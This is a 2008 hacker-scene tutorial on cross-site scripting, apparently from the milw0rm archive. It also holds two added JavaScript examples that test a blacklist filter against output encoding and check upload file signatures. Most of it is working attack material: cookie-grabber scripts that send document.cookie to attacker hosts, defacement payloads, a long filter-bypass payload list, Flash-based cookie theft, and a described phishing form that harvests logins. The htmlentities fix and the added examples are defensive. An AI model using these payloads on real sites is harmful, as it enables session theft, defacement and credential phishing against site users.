/ /
________________________________________________________________________/ /
| / /
| Cross Site Scripting - Attack and Defense guide / /
|_____________________________________________________________________/ /
/ /
By Xylitol 10-02-08 /___/
Author: Xylitol
Homepage: http://xylitol.free.fr
Contact: Xylitol[at]fbi[dot]gov
Date: 10/02/08
Summary:
1> What is XSS?
2> Code an XSS vulnerability
3> Make a cookie grabber
4> Securing XSS
5> Deface Methods
6> Filtration Bypassing
7> Flash attack
8> XSS upload
9> Phishing XSS
____ ____
/ / \ \
______/ /_____________________________________\ \______
| / / \ \ |
| / /.: Chapter 1 - What is XSS ? :.\ \ |
|___/ /___________________________________________\ \___|
/ / (From Wikipedia, the free encyclopedia) \ \
/___/ \___\
* a web browser bug which under some conditions allows content (scripts)
in one zone to be executed with the permissions of a higher privileged zone.
.: Chapter 2 - Code an XSS vulnerability :.
<html>
<head>
<style type="text/css">
<!--
body,td,th {
color: #FFFFFF;
}
body {
background-color: #000000;
}
-->
</style><title>Simple XSS vulnerability by Xylitol</title>
</head>
<body>
<form action="XSS.php" method="post">
<p align="center"><strong>Simple XSS vulnerability by Xylitol </strong></p>
<div align="center">
<table width="270" border="0">
<tr>
<td width="106"><strong>Search:</strong></td>
<td width="154"><input name="Vulnerability" type="text" id="Vulnerability" /></td>
</tr>
</table>
<table width="268" border="0">
<tr>
<td width="262"><div align="center">
<input name="submit" type="submit" value=" Search it ! " />
</div></td>
</tr>
</table>
</div>
</form>
</body>
</html>
(ASCII drawing of the browser alert box: "http://127.0.0.1 says: XSS", with an OK button)
XSS Vulnerability is here...
____ ____
/ / \ \
______/ /____________________________________\ \______
| / / \ \ |
| / /.: Chapter 3 - Make a cookie grabber :.\ \ |
|___/ /__________________________________________\ \___|
/ / \ \
/___/ \___\
<script>
window.open("http://www.Hax0r.com/cookie.php?cookies="+document.cookie);
</script>
____ ____
/ / \ \
______/ /___________________________________\ \______
| / / \ \ |
| / /.: Chapter 4 - Securing XSS :.\ \ |
|___/ /_________________________________________\ \___|
/ / \ \
/___/ \___\
Fix it:
To fix the XSS vulnerability, use htmlentities(). At line 16, replace:
<body>
<span class="alerte">Search result :</span> <strong><?php echo $_POST['Vulnerability']; ?></strong>
</body>
with:
<body>
<span class="alerte">Search result :</span> <strong><?php if(isset($_POST['Vulnerability'])) { echo htmlentities($_POST['Vulnerability']); } ?></strong>
</body>
Other functions:
htmlentities() with quote encoding (ENT_QUOTES)
strip_tags()
...
____ ____
/ / \ \
______/ /___________________________________\ \______
| / / \ \ |
| / /.: Chapter 5 - Deface Methods :.\ \ |
|___/ /_________________________________________\ \___|
/ / \ \
/___/ \___\
Defacement with an image:
<IMG SRC="http://hax0r.com/Haxored.png">
or with a Flash video:
<EMBED SRC="http://hax0r.com/Haxored.swf">
See also:
<meta http-equiv="refresh" content="0; url=http://hax0r.com/Haxored.html" />
____ ____
/ / \ \
______/ /___________________________________\ \______
| / / \ \ |
| / /.: Chapter 6 - Filtration Bypassing :.\ \ |
|___/ /_________________________________________\ \___|
/ / \ \
/___/ \___\
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
'">><marquee><h1>XSS</h1></marquee>
'">><script>alert('XSS')</script>
'>><marquee><h1>XSS</h1></marquee>
"><script>alert(String.fromCharCode(88,83,83))</script>
<div style="x:expression((window.r==1)?'':eval('r=1;alert(String.fromCharCode(88,83,83));'))">
window.alert("Xyli !");
<body onLoad="alert('XSS');"
<body onunload="javascript:alert('XSS');">
[url=javascript:alert('XSS');]click me[/url]
<script language="JavaScript">alert('XSS')</script>
<img src="javascript:alert('XSS')">
'); alert('XSS
<font style='color:expression(alert(document.cookie))'>
<IMG DYNSRC="javascript:alert('XSS')">
<IMG LOWSRC="javascript:alert('XSS')">
</textarea><script>alert(/xss/)</script>
</title><script>alert(/xss/)</script>
<script src=http://yoursite.com/your_files.js></script>
"><script>alert(0)</script>
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC="jav
ascript:alert('XSS');">
<IMG SRC="jav	ascript:alert('XSS');">
<marquee><script>alert('XSS')</script></marquee>
<? echo('<scr)';
echo('ipt>alert("XSS")</script>'); ?>
<style>@im\port'\ja\vasc\ript:alert("XSS")';</style>
<script>alert(String.fromCharCode(88,83,83))</script>
<scr<script>ipt>alert('XSS');</scr</script>ipt>
<script>location.href="http://www.evilsite.org/cookiegrabber.php?cookie="+escape(document.cookie)</script>
<script src="http://www.evilsite.org/cookiegrabber.php"></script>
<script>alert('XSS');</script>
<script>alert(1);</script>
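Added example, not part of Xylitol's tutorial: a blacklist filter of the kind the payloads above defeat, next to the output-encoding fix from Chapter 4 (the equivalent of PHP htmlentities() for output in an HTML text context), both run over payloads taken from the list above. The payload strings are test data only; nothing is rendered.

```javascript
// Naive "fix": strip <script ...> and </script> tags in a single pass.
function stripScriptTags(input) {
  return input.replace(/<\/?script[^>]*>/gi, "");
}

// Proper fix for an HTML text context: encode every character that can open a tag
// or close an attribute. This is what htmlentities() does in the Chapter 4 fix.
function htmlEncode(input) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#039;" };
  return input.replace(/[&<>"']/g, (c) => map[c]);
}

// Heuristic used only to grade the two filters: does the output still open a tag?
function stillInjectsHtml(output) {
  return /<\s*\/?[a-z!]/i.test(output);
}

// Constructed test inputs, copied from the bypass list above.
const PAYLOADS = [
  "<script>alert('XSS')</script>",
  "<scr<script>ipt>alert('XSS');</scr</script>ipt>", // reassembles after one strip pass
  "<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>",
  "<body onLoad=\"alert('XSS');\"",
  "'\">><marquee><h1>XSS</h1></marquee>",
  "\"><script>alert(0)</script>",
];

// Returns the payloads a given filter lets through unneutralised.
function survivors(filter) {
  return PAYLOADS.filter((p) => stillInjectsHtml(filter(p)));
}

console.log("blacklist lets through:", survivors(stripScriptTags));
console.log("htmlEncode lets through:", survivors(htmlEncode));
```

The blacklist passes four of the six payloads (the nested `<scr<script>ipt>` one comes out as a clean `<script>` tag), while encoding neutralises all of them because no `<` survives.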
Chapter 7 - Flash attack
Here is the ActionScript that calls JavaScript to show an alert:
getURL("javascript:alert('XSS')");
and in Haxored.js:
document.location="http://hax0r.com/cookiestealer.php?cookie="+document.cookie;
To secure against this, the simple solution: do not allow Flash files in your web app.
____ ____
/ / \ \
______/ /______________________________________\ \______
| / / \ \ |
| / /.: Chapter 8 - XSS upload :.\ \ |
|___/ /____________________________________________\ \___|
/ / \ \
/___/ \___\
PNG = ‰PNG
GIF = GIF89a
JPG = ÿØÿà JFIF
BMP = BMFÖ
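Added example, not from the tutorial: a server-side check for uploaded files that identifies them by the magic numbers listed above, plus the response headers (assumed here as the mitigation: correct Content-Type, nosniff, attachment) that a download endpoint should send so that a file which starts like an image but carries HTML is never rendered as a page. The sample upload bytes are constructed inline.

```javascript
const SIGNATURES = [
  { type: "image/png",  magic: [0x89, 0x50, 0x4e, 0x47] },             // ‰PNG
  { type: "image/gif",  magic: [0x47, 0x49, 0x46, 0x38, 0x39, 0x61] }, // GIF89a
  { type: "image/jpeg", magic: [0xff, 0xd8, 0xff, 0xe0] },             // ÿØÿà (JFIF)
  { type: "image/bmp",  magic: [0x42, 0x4d] },                         // BM
];

// Returns the MIME type whose signature the file starts with, or null.
function detectMagic(bytes) {
  for (const { type, magic } of SIGNATURES) {
    if (bytes.length >= magic.length && magic.every((b, i) => bytes[i] === b)) return type;
  }
  return null;
}

// The signature only describes the first bytes; the rest can be anything, so a
// magic-number check alone does not prove the file is an image.
function carriesMarkup(bytes) {
  return /<\s*(script|html|body|iframe|meta|img)\b/i.test(Buffer.from(bytes).toString("latin1"));
}

// Accept only known image signatures. The markup scan is a weak extra signal
// (blacklists are bypassable, see Chapter 6); the headers below are the real protection.
function acceptUpload(bytes) {
  return detectMagic(bytes) !== null && !carriesMarkup(bytes);
}

// Headers for serving a stored upload: declare the detected type, forbid MIME
// sniffing, and force a download instead of inline rendering.
function downloadHeaders(bytes) {
  const type = detectMagic(bytes);
  if (type === null) throw new Error("unknown file signature");
  return {
    "Content-Type": type,
    "X-Content-Type-Options": "nosniff",
    "Content-Disposition": "attachment",
  };
}

// Constructed sample: a PNG signature followed by HTML instead of image data.
const PNG_HEADER = Buffer.from([0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a]);
const FAKE_PNG = Buffer.concat([PNG_HEADER, Buffer.from("<html><script>alert('XSS')</script></html>")]);

console.log(detectMagic(FAKE_PNG), acceptUpload(FAKE_PNG), downloadHeaders(FAKE_PNG));
```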
____ ____
/ / \ \
______/ /______________________________________\ \______
| / / \ \ |
| / /.: Chapter 9 - Phishing XSS :.\ \ |
|___/ /____________________________________________\ \___|
/ / \ \
/___/ \___\
As you will have guessed, the script simulates a login form and sends the entered values to you.
Example PHP file for sending this email (mail.php):
The user will believe that the server is overloaded and will suspect nothing.
I think you have understood the principle?
____ ____
/ / \ \
______/ /______________________________________\ \______
| / / \ \ |
| / /.: Xylitol's respects and greetings go out to :.\ \ |
|___/ /____________________________________________\ \___|
/ / \ \
/___/ \___\
_________________________________
| |
| .: Xylitol thanks these sites :. |
|_________________________________|
http://www.googlebig.com/
http://xssed.com/
http://www.xssing.com/
http://www.milw0rm.com/
http://H4cky0u.org/
# milw0rm.com [2008-02-18]